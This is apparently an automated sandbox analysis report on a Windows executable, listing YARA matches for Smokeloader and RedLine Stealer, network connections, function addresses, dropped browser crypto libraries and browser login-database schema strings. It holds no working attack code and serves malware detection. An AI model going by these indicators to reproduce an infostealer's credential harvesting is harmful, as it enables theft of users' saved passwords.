Source: unknown Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown HTTPS traffic detected: 23.221.242.90:443 -> 192.168.2.5:49721 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.221.242.90:443 -> 192.168.2.5:49722 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.5:49723 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.190.151.9:443 -> 192.168.2.5:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.190.151.9:443 -> 192.168.2.5:49732 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.190.151.9:443 -> 192.168.2.5:49737 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.5:49742 version: TLS 1.2

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 00000000.00000002.2441369088.0000000003640000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.2441167246.0000000001B7B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Contains functionality to call native functions
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C7BB700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6C7BB700
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C7BB8C0 rand_s,NtQueryVirtualMemory, 0_2_6C7BB8C0
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C7BB910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError, 0_2_6C7BB910
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C75F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6C75F280
Detected potential crypto function
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C7535A0 0_2_6C7535A0
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C7C545C 0_2_6C7C545C
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C765440 0_2_6C765440
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C7C542B 0_2_6C7C542B
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C795C10 0_2_6C795C10
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C7A2C10 0_2_6C7A2C10
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C7CAC00 0_2_6C7CAC00
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C796CF0 0_2_6C796CF0
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C75D4E0 0_2_6C75D4E0
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C77D4D0 0_2_6C77D4D0
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C7664C0 0_2_6C7664C0
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C7B34A0 0_2_6C7B34A0
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C7BC4A0 0_2_6C7BC4A0
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C766C80 0_2_6C766C80
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C77ED10 0_2_6C77ED10
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C780512 0_2_6C780512
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C76FD00 0_2_6C76FD00
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C7B85F0 0_2_6C7B85F0
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C790DD0 0_2_6C790DD0
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C75C670 0_2_6C75C670
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C7C6E63 0_2_6C7C6E63
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C779E50 0_2_6C779E50
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C793E50 0_2_6C793E50
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C7A2E4E 0_2_6C7A2E4E
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C774640 0_2_6C774640
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C7B9E30 0_2_6C7B9E30
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C797E10 0_2_6C797E10
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C7A5600 0_2_6C7A5600
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C75BEF0 0_2_6C75BEF0
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C76FEF0 0_2_6C76FEF0
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C7C76E3 0_2_6C7C76E3
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C7B4EA0 0_2_6C7B4EA0
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C775E90 0_2_6C775E90
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C7BE680 0_2_6C7BE680
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C797710 0_2_6C797710
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C769F00 0_2_6C769F00
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C786FF0 0_2_6C786FF0
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C75DFE0 0_2_6C75DFE0
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C7A77A0 0_2_6C7A77A0
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C79F070 0_2_6C79F070
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C778850 0_2_6C778850
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C77D850 0_2_6C77D850
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C79B820 0_2_6C79B820
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C7A4820 0_2_6C7A4820
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C767810 0_2_6C767810
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C77C0E0 0_2_6C77C0E0
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C7958E0 0_2_6C7958E0
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C7C50C7 0_2_6C7C50C7
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C7860A0 0_2_6C7860A0
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C7AB970 0_2_6C7AB970
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C7CB170 0_2_6C7CB170
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C76D960 0_2_6C76D960
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C77A940 0_2_6C77A940
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C78D9B0 0_2_6C78D9B0
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C75C9A0 0_2_6C75C9A0
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C795190 0_2_6C795190
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C7B2990 0_2_6C7B2990
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C799A60 0_2_6C799A60
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C771AF0 0_2_6C771AF0
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C79E2F0 0_2_6C79E2F0
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C798AC0 0_2_6C798AC0
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C76CAB0 0_2_6C76CAB0
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C7C2AB0 0_2_6C7C2AB0
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C7522A0 0_2_6C7522A0
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C784AA0 0_2_6C784AA0
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C7CBA90 0_2_6C7CBA90
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C76C370 0_2_6C76C370
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C755340 0_2_6C755340
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C79D320 0_2_6C79D320
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C7C53C8 0_2_6C7C53C8
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C75F380 0_2_6C75F380
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C85ECD0 0_2_6C85ECD0
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C8C6C00 0_2_6C8C6C00
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C8DAC30 0_2_6C8DAC30
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C7FECC0 0_2_6C7FECC0
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C80AC60 0_2_6C80AC60
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C896D90 0_2_6C896D90
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C804DB0 0_2_6C804DB0
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C98CDC0 0_2_6C98CDC0
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C988D20 0_2_6C988D20
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C92AD50 0_2_6C92AD50
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C8CED70 0_2_6C8CED70
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C886E90 0_2_6C886E90
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C80AEC0 0_2_6C80AEC0
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C8A0EC0 0_2_6C8A0EC0
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C8E0E20 0_2_6C8E0E20
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C89EE70 0_2_6C89EE70
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C948FB0 0_2_6C948FB0
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C80EFB0 0_2_6C80EFB0
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C800FE0 0_2_6C800FE0
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C8DEFF0 0_2_6C8DEFF0
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C806F10 0_2_6C806F10
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C940F20 0_2_6C940F20
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C86EF40 0_2_6C86EF40
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C8C2F70 0_2_6C8C2F70
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C9068E0 0_2_6C9068E0
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C850820 0_2_6C850820
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C88A820 0_2_6C88A820
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C8D4840 0_2_6C8D4840
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C8909A0 0_2_6C8909A0
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C8BA9A0 0_2_6C8BA9A0
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C8C09B0 0_2_6C8C09B0
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C91C9E0 0_2_6C91C9E0
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C8349F0 0_2_6C8349F0
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C856900 0_2_6C856900
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C838960 0_2_6C838960
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C87EA80 0_2_6C87EA80
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C8AEA00 0_2_6C8AEA00
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C8B8A30 0_2_6C8B8A30
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C87CA70 0_2_6C87CA70
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C8A0BA0 0_2_6C8A0BA0
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C906BE0 0_2_6C906BE0
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C92A480 0_2_6C92A480
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C8464D0 0_2_6C8464D0
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C89A4D0 0_2_6C89A4D0
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C864420 0_2_6C864420
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C88A430 0_2_6C88A430
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C818460 0_2_6C818460
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C8CA5E0 0_2_6C8CA5E0
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C88E5F0 0_2_6C88E5F0
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C948550 0_2_6C948550
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: String function: 6C98DAE0 appears 33 times
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: String function: 6C7994D0 appears 90 times
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: String function: 6C78CBE8 appears 134 times
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: String function: 004043B0 appears 316 times
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: String function: 6C823620 appears 35 times
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: String function: 6C9809D0 appears 139 times
One or more processes crash
Source: C:\Users\user\Desktop\t13pv4ox18.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2788 -s 2076
Sample file is different than original file name gathered from version info
Source: t13pv4ox18.exe, 00000000.00000002.2465550561.000000006C9D5000.00000002.00000001.01000000.00000009.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs t13pv4ox18.exe
Source: t13pv4ox18.exe, 00000000.00000000.1984708217.00000000019F8000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamesFirezer0 vs t13pv4ox18.exe
Source: t13pv4ox18.exe, 00000000.00000002.2465312975.000000006C7E2000.00000002.00000001.01000000.0000000A.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs t13pv4ox18.exe
Source: t13pv4ox18.exe Binary or memory string: OriginalFilenamesFirezer0 vs t13pv4ox18.exe
Uses 32bit PE files
Source: t13pv4ox18.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 00000000.00000002.2441369088.0000000003640000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.2441167246.0000000001B7B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@20/77@10/6
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C7B7030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree, 0_2_6C7B7030
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_00415D00 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 0_2_00415D00
Source: C:\Users\user\Desktop\t13pv4ox18.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\freebl3[1].dll Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2788
Source: C:\Windows\SysWOW64\WerFault.exe File created: C:\ProgramData\Microsoft\Windows\WER\Temp\2f5225ba-70af-445a-b6d2-d53c33a59bc3 Jump to behavior
Source: t13pv4ox18.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\t13pv4ox18.exe File read: C:\Program Files (x86)\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\t13pv4ox18.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: t13pv4ox18.exe, 00000000.00000002.2453868196.000000001C158000.00000004.00000020.00020000.00000000.sdmp, t13pv4ox18.exe, 00000000.00000002.2465109984.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, t13pv4ox18.exe, 00000000.00000002.2465468623.000000006C98F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: t13pv4ox18.exe, 00000000.00000002.2453868196.000000001C158000.00000004.00000020.00020000.00000000.sdmp, t13pv4ox18.exe, 00000000.00000002.2465109984.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, t13pv4ox18.exe, 00000000.00000002.2465468623.000000006C98F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: t13pv4ox18.exe, 00000000.00000002.2453868196.000000001C158000.00000004.00000020.00020000.00000000.sdmp, t13pv4ox18.exe, 00000000.00000002.2465109984.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, t13pv4ox18.exe, 00000000.00000002.2465468623.000000006C98F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: t13pv4ox18.exe, 00000000.00000002.2453868196.000000001C158000.00000004.00000020.00020000.00000000.sdmp, t13pv4ox18.exe, 00000000.00000002.2465109984.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, t13pv4ox18.exe, 00000000.00000002.2465468623.000000006C98F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: t13pv4ox18.exe, t13pv4ox18.exe, 00000000.00000002.2453868196.000000001C158000.00000004.00000020.00020000.00000000.sdmp, t13pv4ox18.exe, 00000000.00000002.2465109984.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, t13pv4ox18.exe, 00000000.00000002.2465468623.000000006C98F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: t13pv4ox18.exe, 00000000.00000002.2453868196.000000001C158000.00000004.00000020.00020000.00000000.sdmp, t13pv4ox18.exe, 00000000.00000002.2465109984.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: t13pv4ox18.exe, 00000000.00000002.2453868196.000000001C158000.00000004.00000020.00020000.00000000.sdmp, t13pv4ox18.exe, 00000000.00000002.2465109984.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, t13pv4ox18.exe, 00000000.00000002.2465468623.000000006C98F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: t13pv4ox18.exe, 00000000.00000003.2077344401.000000002222E000.00000004.00000020.00020000.00000000.sdmp, AECAECFCAAEBFHIEHDGH.0.dr, BKFHCGIDBAAFHIDHDAAE.0.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: t13pv4ox18.exe, 00000000.00000002.2453868196.000000001C158000.00000004.00000020.00020000.00000000.sdmp, t13pv4ox18.exe, 00000000.00000002.2465109984.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: t13pv4ox18.exe, 00000000.00000002.2453868196.000000001C158000.00000004.00000020.00020000.00000000.sdmp, t13pv4ox18.exe, 00000000.00000002.2465109984.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
Source: t13pv4ox18.exe ReversingLabs: Detection: 50%
Source: t13pv4ox18.exe Virustotal: Detection: 43%
Source: unknown Process created: C:\Users\user\Desktop\t13pv4ox18.exe "C:\Users\user\Desktop\t13pv4ox18.exe"
Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2016 --field-trial-handle=1984,i,12478571798044069574,3483504227359408998,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\Desktop\t13pv4ox18.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2788 -s 2076
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2016 --field-trial-handle=1984,i,12478571798044069574,3483504227359408998,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\t13pv4ox18.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\t13pv4ox18.exe Section loaded: msimg32.dll Jump to behavior
Source: C:\Users\user\Desktop\t13pv4ox18.exe Section loaded: msvcr100.dll Jump to behavior
Source: C:\Users\user\Desktop\t13pv4ox18.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\t13pv4ox18.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\t13pv4ox18.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\Desktop\t13pv4ox18.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\t13pv4ox18.exe Section loaded: ntasn1.dll Jump to behavior
